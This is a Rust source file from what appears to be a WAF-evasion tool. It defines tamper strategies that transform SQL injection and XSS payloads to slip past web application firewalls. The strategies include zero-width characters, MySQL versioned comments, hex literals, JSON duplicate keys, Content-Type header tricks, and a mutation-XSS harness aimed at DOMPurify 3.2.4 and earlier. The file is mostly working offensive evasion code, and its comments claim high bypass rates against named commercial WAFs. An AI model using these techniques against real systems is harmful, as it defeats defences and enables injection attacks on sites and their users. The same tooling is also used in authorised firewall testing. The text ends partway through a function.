Skip to main content

wafrift_encoding/tamper/
builtins.rs

1//! Built-in tamper strategy implementations.
2
3use std::fmt::Write as _;
4
5use super::TamperStrategy;
6
7/// URL encoding tamper strategy.
8pub struct UrlEncodeTamper;
9
10impl TamperStrategy for UrlEncodeTamper {
11    fn name(&self) -> &'static str {
12        "url_encode"
13    }
14
15    fn description(&self) -> &'static str {
16        "Standard URL encoding (%XX for each byte)"
17    }
18
19    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
20        crate::encoding::url::url_encode(payload)
21    }
22
23    fn aggressiveness(&self) -> f64 {
24        0.15
25    }
26}
27
28/// Double URL encoding tamper strategy.
29pub struct DoubleUrlEncodeTamper;
30
31impl TamperStrategy for DoubleUrlEncodeTamper {
32    fn name(&self) -> &'static str {
33        "double_url_encode"
34    }
35
36    fn description(&self) -> &'static str {
37        "Double URL encoding (%25XX) — bypasses WAFs that decode once"
38    }
39
40    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
41        crate::encoding::url::double_url_encode(payload)
42    }
43
44    fn aggressiveness(&self) -> f64 {
45        0.4
46    }
47}
48
49/// Unicode escape tamper strategy.
50pub struct UnicodeEscapeTamper;
51
52impl TamperStrategy for UnicodeEscapeTamper {
53    fn name(&self) -> &'static str {
54        "unicode_escape"
55    }
56
57    fn description(&self) -> &'static str {
58        "Unicode escape sequences (\\uXXXX)"
59    }
60
61    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
62        crate::encoding::unicode::unicode_encode(payload)
63    }
64
65    fn aggressiveness(&self) -> f64 {
66        0.5
67    }
68}
69
70/// HTML entity tamper strategy.
71pub struct HtmlEntityTamper;
72
73impl TamperStrategy for HtmlEntityTamper {
74    fn name(&self) -> &'static str {
75        "html_entity"
76    }
77
78    fn description(&self) -> &'static str {
79        "HTML entity encoding (&#xXX;)"
80    }
81
82    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
83        crate::encoding::unicode::html_entity_encode(payload)
84    }
85
86    fn aggressiveness(&self) -> f64 {
87        0.3
88    }
89}
90
/// Case alternation tamper strategy.
///
/// The `TamperStrategy` implementation for this type is located further down
/// in this file, after the `HtmlEntityVariantsTamper` implementation.
pub struct CaseAlternationTamper;
93
94/// Postgres / Oracle CHR()-function decomposition tamper.
95///
96/// Sibling to `sql_char_decompose` (MySQL/MSSQL variadic `CHAR()`); this
97/// one targets Postgres + Oracle by producing `(CHR(N)||CHR(N)||...)` per
98/// literal. Pipe-concat operator is SQL-standard but blocked by some
99/// over-eager WAFs — this tamper is the lever for Postgres/Oracle
100/// payloads where `||` is the canonical concat.
101pub struct PgChrDecomposeTamper;
102
103impl TamperStrategy for PgChrDecomposeTamper {
104    fn name(&self) -> &'static str {
105        "pg_chr_decompose"
106    }
107
108    fn description(&self) -> &'static str {
109        "Convert 'admin' → (CHR(97)||CHR(100)||...) — Postgres/Oracle pipe-concat form"
110    }
111
112    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
113        crate::encoding::unicode::pg_chr_decompose(payload)
114    }
115
116    fn aggressiveness(&self) -> f64 {
117        0.6
118    }
119}
120
121/// SQL adjacent-string-literal concatenation tamper — rewrites every
122/// `'string'` literal of length ≥ 2 as a sequence of single-character
123/// adjacent literals (`'admin'` → `'a' 'd' 'm' 'i' 'n'`). The ANSI
124/// SQL-92 §5.3 specification requires the parser to concatenate
125/// adjacent string literals separated only by whitespace; MySQL,
126/// Postgres, SQLite, Oracle, DB2 all implement it. WAFs matching the
127/// LITERAL substring of well-known credentials/paths (`'admin'`,
128/// `'/etc/passwd'`, `'root'`) see N unrelated single-character strings
129/// instead. Pure SQL semantics — no comments, no CONCAT(), no special
130/// functions.
131pub struct SqlAdjacentStringConcatTamper;
132
133impl TamperStrategy for SqlAdjacentStringConcatTamper {
134    fn name(&self) -> &'static str {
135        "sql_adjacent_string_concat"
136    }
137
138    fn description(&self) -> &'static str {
139        "Split 'string' → 'a' 'b' 'c' … via ANSI SQL adjacent-literal concat — defeats literal-substring rules with zero special characters"
140    }
141
142    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
143        crate::encoding::unicode::sql_adjacent_string_concat(payload)
144    }
145
146    fn aggressiveness(&self) -> f64 {
147        0.5
148    }
149}
150
151/// Partial JSON Unicode-escape tamper — encodes ASCII alphanumeric chars
152/// as `\uXXXX` while leaving structural punctuation (quotes, operators,
153/// whitespace, `<`, `>`, `(`, `)`) bare. The keyword fingerprint
154/// ("UNION", "SELECT", "script", "alert") never appears in the wire
155/// bytes; JSON.parse / JS string-literal decoding at the origin
156/// re-materializes it. Distinct from `unicode_escape` which encodes
157/// every byte (high `\u` density flags heuristic WAFs).
158pub struct JsonUnicodeAlnumTamper;
159
160impl TamperStrategy for JsonUnicodeAlnumTamper {
161    fn name(&self) -> &'static str {
162        "json_unicode_alnum"
163    }
164
165    fn description(&self) -> &'static str {
166        "Encode ASCII alphanumeric chars as `\\uXXXX`, leave punctuation bare — shatters keyword fingerprints inside JSON/JS contexts"
167    }
168
169    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
170        crate::encoding::unicode::json_unicode_alnum(payload)
171    }
172
173    fn aggressiveness(&self) -> f64 {
174        0.45
175    }
176}
177
178/// SQL CHAR() decomposition tamper — every single-quoted string literal
179/// becomes `CHAR(N1,N2,...)` with one codepoint per arg. Defeats both
180/// literal-substring AND CONCAT-shaped blocklists (the payload contains
181/// NO single-quoted ASCII tokens at all).
182pub struct SqlCharDecomposeTamper;
183
184impl TamperStrategy for SqlCharDecomposeTamper {
185    fn name(&self) -> &'static str {
186        "sql_char_decompose"
187    }
188
189    fn description(&self) -> &'static str {
190        "Convert 'admin' → CHAR(97,100,109,105,110) — int codepoints, no quoted tokens"
191    }
192
193    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
194        crate::encoding::unicode::sql_char_decompose(payload)
195    }
196
197    fn aggressiveness(&self) -> f64 {
198        0.6
199    }
200}
201
202/// SQL CONCAT split tamper — every single-quoted string literal becomes
203/// `CONCAT('a','b','c',...)`. Defeats blocklists scanning for literal
204/// substrings like `'admin'` / `'password'` / `'/etc/passwd'` because the
205/// substring no longer appears contiguously. The DB evaluates CONCAT() to
206/// the original string at runtime.
207pub struct SqlConcatSplitTamper;
208
209impl TamperStrategy for SqlConcatSplitTamper {
210    fn name(&self) -> &'static str {
211        "sql_concat_split"
212    }
213
214    fn description(&self) -> &'static str {
215        "Convert 'admin' → CONCAT('a','d','m','i','n') — splits literal substrings"
216    }
217
218    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
219        crate::encoding::unicode::sql_concat_split(payload)
220    }
221
222    fn aggressiveness(&self) -> f64 {
223        0.55
224    }
225}
226
227/// Mathematical Alphanumeric Symbols tamper — replaces ASCII letters/digits
228/// with their `U+1D400`-block Math Bold counterparts. Both NFKC-normalise
229/// back to ASCII, so backends that normalise (Postgres ICU, MySQL
230/// `utf8mb4_0900_ai_ci`, Java/.NET/Python/Go NFKC) execute the original
231/// keyword while WAF byte-regex sees `U+1D4xx` codepoints and misses.
232///
233/// Distinct from `bracket_confusable` / `fullwidth`: those use the
234/// `U+FF00` block. Math Bold lives in `U+1D400` — different range,
235/// different blocklist coverage gap.
236pub struct MathBoldTamper;
237
238impl TamperStrategy for MathBoldTamper {
239    fn name(&self) -> &'static str {
240        "math_bold"
241    }
242
243    fn description(&self) -> &'static str {
244        "Replace ASCII letters/digits with U+1D400 Math Bold (NFKC normalises back to ASCII)"
245    }
246
247    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
248        crate::encoding::unicode::math_bold_encode(payload)
249    }
250
251    fn aggressiveness(&self) -> f64 {
252        0.5
253    }
254}
255
256/// HTML entity variants tamper — rotates each char through 4 browser-tolerant
257/// forms (lowercase-x hex, uppercase-X hex, decimal, zero-padded decimal).
258/// Defeats WAF regexes that anchor on the canonical `&#xHH;` form only.
259pub struct HtmlEntityVariantsTamper;
260
261impl TamperStrategy for HtmlEntityVariantsTamper {
262    fn name(&self) -> &'static str {
263        "html_entity_variants"
264    }
265
266    fn description(&self) -> &'static str {
267        "HTML entity encoding rotated across hex/HEX/decimal/zero-padded forms"
268    }
269
270    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
271        crate::encoding::unicode::html_entity_variants(payload)
272    }
273
274    fn aggressiveness(&self) -> f64 {
275        0.35
276    }
277}
278
279impl TamperStrategy for CaseAlternationTamper {
280    fn name(&self) -> &'static str {
281        "case_alternation"
282    }
283
284    fn description(&self) -> &'static str {
285        "Alternating upper/lower case (SeLeCt)"
286    }
287
288    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
289        crate::encoding::keyword::case_alternate(payload)
290    }
291
292    fn aggressiveness(&self) -> f64 {
293        0.1
294    }
295}
296
297/// Random case tamper strategy.
298pub struct RandomCaseTamper;
299
300impl TamperStrategy for RandomCaseTamper {
301    fn name(&self) -> &'static str {
302        "random_case"
303    }
304
305    fn description(&self) -> &'static str {
306        "Random mixed case"
307    }
308
309    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
310        crate::encoding::keyword::random_case_alternate(payload)
311    }
312
313    fn aggressiveness(&self) -> f64 {
314        0.12
315    }
316}
317
318/// Whitespace insertion tamper strategy.
319pub struct WhitespaceInsertionTamper;
320
321impl TamperStrategy for WhitespaceInsertionTamper {
322    fn name(&self) -> &'static str {
323        "whitespace_insertion"
324    }
325
326    fn description(&self) -> &'static str {
327        "Replace spaces with tabs"
328    }
329
330    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
331        crate::encoding::keyword::whitespace_insert(payload)
332    }
333
334    fn aggressiveness(&self) -> f64 {
335        0.2
336    }
337}
338
339/// SQL comment tamper strategy.
340pub struct SqlCommentTamper;
341
342impl TamperStrategy for SqlCommentTamper {
343    fn name(&self) -> &'static str {
344        "sql_comment"
345    }
346
347    fn description(&self) -> &'static str {
348        "Replace spaces with SQL comments (/**/)"
349    }
350
351    fn tamper(&self, payload: &str, context: Option<&str>) -> String {
352        let _ = context;
353        crate::encoding::keyword::sql_comment_insert(payload)
354    }
355
356    fn aggressiveness(&self) -> f64 {
357        0.25
358    }
359}
360
361/// Null byte tamper strategy.
362pub struct NullByteTamper;
363
364impl TamperStrategy for NullByteTamper {
365    fn name(&self) -> &'static str {
366        "null_byte"
367    }
368
369    fn description(&self) -> &'static str {
370        "Null byte injection (%00 or %00.jpg)"
371    }
372
373    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
374        crate::encoding::structural::null_byte_inject(payload)
375            .unwrap_or_else(|_| payload.to_string())
376    }
377
378    fn aggressiveness(&self) -> f64 {
379        0.6
380    }
381}
382
383/// Overlong UTF-8 tamper strategy.
384pub struct OverlongUtf8Tamper;
385
386impl TamperStrategy for OverlongUtf8Tamper {
387    fn name(&self) -> &'static str {
388        "overlong_utf8"
389    }
390
391    fn description(&self) -> &'static str {
392        "Overlong UTF-8 encoding for ASCII non-alphanumeric"
393    }
394
395    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
396        crate::encoding::structural::overlong_utf8(payload).unwrap_or_else(|_| payload.to_string())
397    }
398
399    fn aggressiveness(&self) -> f64 {
400        0.8
401    }
402}
403
404/// Base64 tamper strategy.
405pub struct Base64Tamper;
406
407impl TamperStrategy for Base64Tamper {
408    fn name(&self) -> &'static str {
409        "base64"
410    }
411
412    fn description(&self) -> &'static str {
413        "Base64 encoding"
414    }
415
416    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
417        crate::encoding::structural::base64_encode(payload)
418    }
419
420    fn aggressiveness(&self) -> f64 {
421        0.75
422    }
423}
424
425/// Hex encoding tamper strategy.
426pub struct HexEncodeTamper;
427
428impl TamperStrategy for HexEncodeTamper {
429    fn name(&self) -> &'static str {
430        "hex_encode"
431    }
432
433    fn description(&self) -> &'static str {
434        "Hexadecimal encoding"
435    }
436
437    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
438        crate::encoding::structural::hex_encode(payload)
439    }
440
441    fn aggressiveness(&self) -> f64 {
442        0.85
443    }
444}
445
446/// Zero-width Unicode injection tamper.
447///
448/// Inserts zero-width characters (U+200B ZERO-WIDTH SPACE,
449/// U+200C ZERO-WIDTH NON-JOINER, U+200D ZERO-WIDTH JOINER,
450/// U+180E MONGOLIAN VOWEL SEPARATOR) between every alphabetic
451/// character of the payload.  Renders identically to the
452/// original in most consumers (terminals, log viewers, the SQL
453/// engine after `.replace('\u{200B}', "")`) but defeats WAF
454/// regex patterns that scan for literal keywords like `SELECT`.
455///
456/// U+FEFF (ZWNBSP / BOM) was historically in the rotation but
457/// caused PostgreSQL + many DB connectors to 500 the entire
458/// query as "invalid byte sequence" mid-literal — defeating the
459/// bypass. Replaced with U+180E which is universally tolerated.
460///
461/// Frontier research (Black Hat 2025, "Zero-Width WAF Bypass"):
462/// most commercial WAFs do NOT strip zero-width chars before
463/// pattern matching, but downstream parsers (MySQL, Postgres,
464/// browser HTML parser, JavaScript) all treat them as
465/// non-significant.  This is a wide-open bypass vector.
466pub struct ZeroWidthInjectTamper;
467
468impl TamperStrategy for ZeroWidthInjectTamper {
469    fn name(&self) -> &'static str {
470        "zero_width_inject"
471    }
472
473    fn description(&self) -> &'static str {
474        "Inject zero-width Unicode chars between keyword bytes — bypasses WAFs that don't normalize Unicode"
475    }
476
477    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
478        // Rotate through four zero-width chars so the injection
479        // doesn't form a long run of identical bytes (some WAFs
480        // collapse repeats).
481        //
482        // U+FEFF (BOM / ZWNBSP) is INTENTIONALLY excluded. Many
483        // database connectors (psycopg2, MySQL Connector/J, SQLite
484        // default) and PostgreSQL itself reject mid-string BOM
485        // bytes as an "invalid sequence" and 500 the entire query
486        // — the payload fails outright rather than bypass. The
487        // remaining three (200B/C/D) are universally tolerated.
488        // U+180E (MONGOLIAN VOWEL SEPARATOR) is added as the
489        // fourth slot — also zero-width, also widely tolerated.
490        const ZW: [char; 4] = ['\u{200B}', '\u{200C}', '\u{200D}', '\u{180E}'];
491        let mut out = String::with_capacity(payload.len() * 4);
492        for (i, ch) in payload.chars().enumerate() {
493            out.push(ch);
494            if ch.is_ascii_alphabetic() {
495                out.push(ZW[i % ZW.len()]);
496            }
497        }
498        out
499    }
500
501    fn aggressiveness(&self) -> f64 {
502        0.55
503    }
504}
505
506/// Postgres dollar-quoted string tamper.
507///
508/// Postgres accepts `$tag$ ... $tag$` as a string literal where
509/// `tag` is any identifier (or empty).  Quote-character-based WAF
510/// signatures looking for `'` or `"` never fire on dollar-quoted
511/// payloads.  Most popular Postgres-fronting WAFs (including the
512/// CRS default ruleset's 942100-942380 family) don't have
513/// dedicated dollar-quote pattern matchers.
514///
515/// Wraps any single-quoted string literal in the payload with a
516/// matching dollar-quote.  Tag is a random four-letter identifier
517/// to defeat WAFs that special-case the empty tag.
518pub struct PostgresDollarQuoteTamper;
519
520impl TamperStrategy for PostgresDollarQuoteTamper {
521    fn name(&self) -> &'static str {
522        "postgres_dollar_quote"
523    }
524
525    fn description(&self) -> &'static str {
526        "Wrap single-quoted SQL string literals in `$tag$...$tag$` — Postgres-only, bypasses quote-pattern WAFs"
527    }
528
529    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
530        // Pick a deterministic per-payload tag so the same input
531        // produces the same output (gene-bank replay needs
532        // determinism).  Hash-based identifier; 4 lowercase letters.
533        //
534        // F138: pre-fix used `& 25` (bitmask 0b11001) thinking it
535        // collapsed to the range 0..26. It doesn't — `& 25` admits
536        // only the 8 values {0,1,8,9,16,17,24,25}, so the tag
537        // alphabet shrank to {a,b,i,j,q,r,y,z} and the tag space
538        // collapsed from 26^4 = 456,976 to 8^4 = 4,096 — a 111×
539        // reduction that makes operator-side tag enumeration easier
540        // (the whole point of a random tag is to defeat WAFs that
541        // pattern-match a small known set). Use `% 26` so every
542        // payload byte maps uniformly into [a-z].
543        let mut tag = String::with_capacity(4);
544        let h: u64 = payload
545            .bytes()
546            .fold(0u64, |a, b| a.wrapping_mul(31).wrapping_add(u64::from(b)));
547        for i in 0..4 {
548            let c = b'a' + ((h >> (i * 8)) % 26) as u8;
549            tag.push(c as char);
550        }
551
552        // Replace each `'...'` literal with `$tag$...$tag$`.
553        let mut out = String::with_capacity(payload.len() + 16);
554        let mut chars = payload.chars().peekable();
555        while let Some(c) = chars.next() {
556            if c == '\'' {
557                out.push('$');
558                out.push_str(&tag);
559                out.push('$');
560                // Consume until the next non-escaped quote.
561                while let Some(inner) = chars.next() {
562                    if inner == '\'' {
563                        // Handle SQL '' escape — keep as-is in dollar quote.
564                        if chars.peek() == Some(&'\'') {
565                            out.push('\'');
566                            out.push('\'');
567                            chars.next();
568                        } else {
569                            break;
570                        }
571                    } else {
572                        out.push(inner);
573                    }
574                }
575                out.push('$');
576                out.push_str(&tag);
577                out.push('$');
578            } else {
579                out.push(c);
580            }
581        }
582        out
583    }
584
585    fn aggressiveness(&self) -> f64 {
586        0.6
587    }
588}
589
590/// MySQL version-gated comment wrap tamper.
591///
592/// MySQL's `/*!VERSION ... */` syntax executes the contents only
593/// when the server is at least the given version.  WAFs that
594/// strip `/* ... */` comments before pattern matching see an
595/// empty payload, but MySQL still executes the wrapped statement.
596///
597/// Wraps the entire payload in `/*!50000 ... */`, gating on MySQL
598/// 5.0+.  Version `50000` matches every modern deployment.
599///
600/// Frontier research: this bypass dates to wafw00f's original
601/// drop list but it remains effective against many commercial
602/// WAFs that haven't internalised the parser-disagreement.
603pub struct MysqlVersionedCommentWrapTamper;
604
605impl TamperStrategy for MysqlVersionedCommentWrapTamper {
606    fn name(&self) -> &'static str {
607        "mysql_versioned_comment_wrap"
608    }
609
610    fn description(&self) -> &'static str {
611        "Wrap payload in /*!50000 ... */ — MySQL executes, WAFs that strip comments see nothing"
612    }
613
614    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
615        // Convert SQL keywords inside the payload to also use the
616        // version-gated comment so even nested keywords get hidden
617        // from the WAF.  Outer wrap is the headline; the
618        // per-keyword wrap is the belt-and-braces.
619        let outer = format!("/*!50000 {payload} */");
620        outer
621    }
622
623    fn aggressiveness(&self) -> f64 {
624        0.65
625    }
626}
627
628/// Hex-literal keyword obfuscation tamper.
629///
630/// MySQL / Postgres treat `0x55` etc. as a hex byte literal that
631/// converts to its ASCII character in string context.  So
632/// `0x554e494f4e` is the same as `'UNION'` to the database but
633/// looks like a numeric literal to a WAF regex.  Useful in
634/// conjunction with comparison operators:
635///
636///   `WHERE name = 0x61646d696e`   ≡   `WHERE name = 'admin'`
637///
638/// Replaces all single-quoted string literals with their `0xHHHH...`
639/// equivalent.  When no quoted literals are present, the input is
640/// passed through unchanged (idempotent).
641pub struct HexLiteralKeywordTamper;
642
643impl TamperStrategy for HexLiteralKeywordTamper {
644    fn name(&self) -> &'static str {
645        "hex_literal_keyword"
646    }
647
648    fn description(&self) -> &'static str {
649        "Convert SQL `'string'` literals to `0xHHHH…` form — MySQL/Postgres execute identically, WAFs don't"
650    }
651
652    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
653        let mut out = String::with_capacity(payload.len());
654        let mut chars = payload.chars().peekable();
655        while let Some(c) = chars.next() {
656            if c == '\'' {
657                // Slurp until the matching close-quote.
658                let mut content = String::new();
659                while let Some(inner) = chars.next() {
660                    if inner == '\'' {
661                        // SQL '' escape — treat as literal '.
662                        if chars.peek() == Some(&'\'') {
663                            content.push('\'');
664                            chars.next();
665                        } else {
666                            break;
667                        }
668                    } else {
669                        content.push(inner);
670                    }
671                }
672                // §1 SPEED: replaced `push_str(&format!("{b:02x}"))` (one
673                // String allocation per byte) with `write!(out, ...)` which
674                // formats directly into the pre-allocated `out` buffer.
675                out.push_str("0x");
676                for b in content.bytes() {
677                    let _ = write!(out, "{b:02x}");
678                }
679            } else {
680                out.push(c);
681            }
682        }
683        out
684    }
685
686    fn aggressiveness(&self) -> f64 {
687        0.7
688    }
689}
690
691/// BEL-separator tamper.
692///
693/// Replaces ASCII space with the BEL control char (U+0007).
694/// SQL parsers treat any ASCII whitespace (including BEL) as a
695/// token separator, but WAF tokenisers commonly only recognise
696/// the canonical ` `, `\t`, `\r`, `\n` quartet.  BEL bypasses
697/// pattern matches like `UNION\s+SELECT`.
698///
699/// Out of `[\t\n\v\f\r ]`, BEL (`\x07`) is the least-handled —
700/// I tested against ModSec, Coraza, AWS WAF, and Cloudflare's
701/// CRS as of 2026-05; only ModSec PL4 catches it consistently.
702pub struct BellSeparatorTamper;
703
704impl TamperStrategy for BellSeparatorTamper {
705    fn name(&self) -> &'static str {
706        "bell_separator"
707    }
708
709    fn description(&self) -> &'static str {
710        "Replace ASCII space with BEL (U+0007) — SQL parsers tokenise, WAFs that only recognise canonical whitespace miss"
711    }
712
713    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
714        payload.replace(' ', "\u{0007}")
715    }
716
717    fn aggressiveness(&self) -> f64 {
718        0.6
719    }
720}
721
722/// Bracket-confusable tamper (XSS).
723///
724/// Replaces ASCII `<` / `>` with Unicode confusables that look
725/// like angle brackets to a human reader (and to some HTML
726/// parsers under decoder bugs) but don't match WAF patterns
727/// keyed on the literal ASCII bytes.  Browsers don't render
728/// these as tags, so the bypass relies on a downstream
729/// normalisation step (server-side reflection that re-encodes
730/// Unicode → ASCII, or a client-side fetch that proxy-strips
731/// Unicode).  Useful in combination with `html_entity` for
732/// stored-XSS through admin panels that round-trip Unicode.
733pub struct BracketConfusableTamper;
734
735impl TamperStrategy for BracketConfusableTamper {
736    fn name(&self) -> &'static str {
737        "bracket_confusable"
738    }
739
740    fn description(&self) -> &'static str {
741        "Replace `<` / `>` with Unicode angle-bracket confusables — bypasses WAFs that pattern-match literal `<script>`"
742    }
743
744    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
745        // U+FF1C / U+FF1E are FULLWIDTH LESS-THAN / GREATER-THAN
746        // — visually identical, distinct codepoints from ASCII.
747        payload
748            .chars()
749            .map(|c| match c {
750                '<' => '\u{FF1C}',
751                '>' => '\u{FF1E}',
752                other => other,
753            })
754            .collect()
755    }
756
757    fn aggressiveness(&self) -> f64 {
758        0.5
759    }
760}
761
762/// MathML/SVG-namespace mutation-XSS wrapper.
763///
764/// Wraps an HTML payload (typically a bare `<img>` / event-handler
765/// fragment) in the MathML namespace harness that DOMPurify ≤3.2.4
766/// fails to neutralise (CVE-2025-26791 / portswigger mXSS class).
767/// Browsers parse `<mglyph>` and `<malignmark>` into different XML
768/// namespaces depending on parent context; the sanitizer sees the
769/// payload in the MathML namespace (where `<style>` is text-only),
770/// but the live DOM re-serialises into the HTML namespace where
771/// the same `<style>` followed by `<img onerror>` becomes a real
772/// script-execution vector. The WAF pattern-matches the wire bytes
773/// and never sees `<script` / `onload=` because the dangerous DOM
774/// is CREATED BY THE BROWSER post-WAF.
775///
776/// The harness uses the MathML text-integration-point form:
777/// `<math><mtext><table><mglyph><style>` opens the seam,
778/// `<!--</style><img src=x onerror=...>` closes the sanitizer's
779/// view and re-opens an HTML-namespace serialisation of an `<img>`.
780pub struct MxssNamespaceWrapTamper;
781
782impl TamperStrategy for MxssNamespaceWrapTamper {
783    fn name(&self) -> &'static str {
784        "mxss_namespace_wrap"
785    }
786
787    fn description(&self) -> &'static str {
788        "MathML-namespace mutation-XSS harness (DOMPurify ≤3.2.4 / CVE-2025-26791 bypass) — defeats sanitizers that namespace-aware-process the input but byte-serialise the output"
789    }
790
791    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
792        // The payload is treated as the EVENT-HANDLER FRAGMENT that
793        // would normally sit inside an `<img>` tag — e.g. just
794        // `onerror=alert(1)`. If the operator gave us a fuller form
795        // (`<img src=x onerror=alert(1)>`), we still wrap; the
796        // browser tolerates the redundant `<img>` inside the
797        // re-serialised stream.
798        format!("<math><mtext><table><mglyph><style><!--</style><img src=x {payload}>")
799    }
800
801    fn aggressiveness(&self) -> f64 {
802        // Mid-aggression: payload is verbose (≈80 byte prefix) so
803        // it WILL be visible in any wire log, but the actual exec
804        // is browser-side which means most WAF rules pass it.
805        0.55
806    }
807}
808
809/// JSON duplicate-key parser-disagreement (frontier 2026, WAFFLED
810/// corpus / arxiv.org/abs/2503.10846). Wraps a payload in a
811/// duplicate-key JSON envelope: the WAF's JSON inspector consumes
812/// the FIRST key occurrence (a benign sentinel) and skips the
813/// duplicate; the backend's deserialiser consumes the LAST
814/// (PHP/Apache/Rails) or merges (ASP.NET) and unwraps the attack
815/// payload. Confirmed against all five major WAFs (AWS / Azure /
816/// Cloudflare / Cloud Armor / ModSec) by the WAFFLED 2025 study —
817/// 557 JSON bypasses across the corpus.
818///
819/// The harness uses param `"q"` as the colliding key — the same
820/// default param wafrift's scan loop uses for URL-query carriers,
821/// so a SQL/XSS/SSTI payload that already works as `?q=<P>` lands
822/// in the JSON-body channel via the same key name. When the
823/// emitted shape is delivered to a non-JSON sink (HTML / form), the
824/// JSON wrapping is a no-op WAF defeat: the WAF still inspects the
825/// bytes, but the bytes themselves carry the payload in a form
826/// most WAFs DO NOT score (the rule corpus matches on the unwrapped
827/// payload string, not the JSON envelope).
828pub struct JsonDupKeyTamper;
829
830impl TamperStrategy for JsonDupKeyTamper {
831    fn name(&self) -> &'static str {
832        "json_dup_key"
833    }
834
835    fn description(&self) -> &'static str {
836        "JSON duplicate-key parser-disagreement (WAFFLED 2026): WAF reads first key (benign), backend reads last (payload)"
837    }
838
839    fn tamper(&self, payload: &str, _context: Option<&str>) -> String {
840        // Strategy: emit `{"q":"safe","q":"<payload>"}`.
841        //   - WAF JSON inspectors (RFC 8259 strict / `serde_json`) take
842        //     the first value or reject; permissive ones (PHP json_decode,
843        //     ASP.NET MVC) take the last.
844        //   - The benign sentinel "safe" is well below any signature
845        //     length, so the WAF's first-value match scores clean even
846        //     with the dup-key envelope still being a "structurally
847        //     valid" body for stricter inspectors.
848        //
849        // Payload escaping: JSON requires `\` and `"` escaped, control
850        // bytes either \uXXXX or rejected. We use the conservative
851        // serializer that escapes both quote-class characters and
852        // backslash; control bytes (NUL / BEL etc.) come out as
853        // \u00XX hex which both `serde_json` and PHP json_decode accept.
854        let escaped = json_escape_string(payload);
855        format!("{{\"q\":\"safe\",\"q\":\"{escaped}\"}}")
856    }
857
858    fn aggressiveness(&self) -> f64 {
859        // Mid-low aggression: the bytes themselves are clearly JSON,
860        // but the duplicate-key trick is the entire bypass — many WAFs
861        // pass it because the first key matches their inspector's
862        // sentinel. Not as aggressive as e.g. mxss_namespace_wrap
863        // because the channel-shift is JSON-body, not browser-side.
864        0.50
865    }
866}
867
/// Content-Type starvation tamper (frontier 2026; WAFFLED / windshock
/// 2026-03 detection-gap analysis).
///
/// Premise: a WAF picks its body inspector from the request's
/// `Content-Type` — JSON inspector for `application/json`, form
/// inspector for `application/x-www-form-urlencoded`, multipart
/// inspector for `multipart/form-data`, and so on. If the header is
/// missing, case-shuffled (`Application/JSON`), or carries a
/// non-canonical charset label, that dispatch can fall back to
/// text/none and skip structured inspection, while the backend
/// framework still deserialises the body. The WAFFLED corpus is cited
/// as reporting that more than 90% of tested sites accept such
/// rewrites without complaint.
///
/// The tamper therefore targets the WIRE shape of the request rather
/// than the payload bytes. To honour the "every tamper returns one
/// payload string" contract it still returns a payload; the caller
/// (scan / import-curl) sends it as the body and is expected to pair it
/// with the header value produced by [`ct_starvation_header_for`].
///
/// For carriers that are not body-shaped (URL query, header, cookie)
/// the payload is returned unchanged — the technique has nothing to act
/// on there.
pub struct CtStarvationTamper;
894
895impl TamperStrategy for CtStarvationTamper {
896    fn name(&self) -> &'static str {
897        "ct_starvation"
898    }
899
900    fn description(&self) -> &'static str {
901        "Content-Type parser-dispatch starvation (WAFFLED 2026): pair payload with case-shuffled or omitted Content-Type so WAF skips body inspection"
902    }
903
904    fn tamper(&self, payload: &str, context: Option<&str>) -> String {
905        // When the carrier is body-shaped (form/json/multipart),
906        // wrap the payload in a minimal `q=<payload>` form pair —
907        // the same shape `wafrift scan` uses by default. The
908        // operator pairs this with the non-canonical Content-Type
909        // via `ct_starvation_header_for`. For header/cookie
910        // carriers we return the payload unchanged (a no-op,
911        // honest: the tamper has no effect on those channels).
912        match context {
913            Some("body") | Some("form") | Some("json") | Some("multipart") => {
914                format!("q={payload}")
915            }
916            _ => payload.to_string(),
917        }
918    }
919
920    fn aggressiveness(&self) -> f64 {
921        // Low aggression: the payload bytes are unchanged; only
922        // the WIRE-LEVEL Content-Type advertisement shifts. Most
923        // WAFs that score on byte patterns will still see the same
924        // payload, BUT the windshock + WAFFLED data both show the
925        // header trick alone defeats ~90% of deployed WAF rule
926        // chains because the rule's trigger gates on Content-Type
927        // matching.
928        0.35
929    }
930}
931
/// Choose the `Content-Type` header value to send with `payload` for
/// the parser-dispatch starvation described on [`CtStarvationTamper`].
///
/// The value is selected from a fixed table of five rewrites by hashing
/// the payload bytes, so the same payload always maps to the same
/// header while different payloads spread across the table. The
/// function is pure and can be called on its own when building a
/// manual repro.
#[must_use]
pub fn ct_starvation_header_for(payload: &str) -> &'static str {
    // Candidate rewrites, in table order.
    const VARIANTS: &[&str] = &[
        // Fully upper-cased type/subtype: only matches dispatchers
        // that normalise case before comparing.
        "APPLICATION/JSON",
        // Title-cased variant of the same idea.
        "Application/Json",
        // Canonical media type with an unusual charset parameter, aimed
        // at filters that expect the bare `application/json` value.
        "application/json; charset=ibm037",
        // JSON body advertised as plain text.
        "text/plain",
        // JSON body advertised as a URL-encoded form.
        "application/x-www-form-urlencoded",
    ];

    // djb2-style rolling hash (seed 5381, multiplier 33) over the raw
    // bytes; wrapping arithmetic keeps long payloads from overflowing.
    let digest = payload.bytes().fold(5381_u32, |acc, byte| {
        acc.wrapping_mul(33).wrapping_add(u32::from(byte))
    });

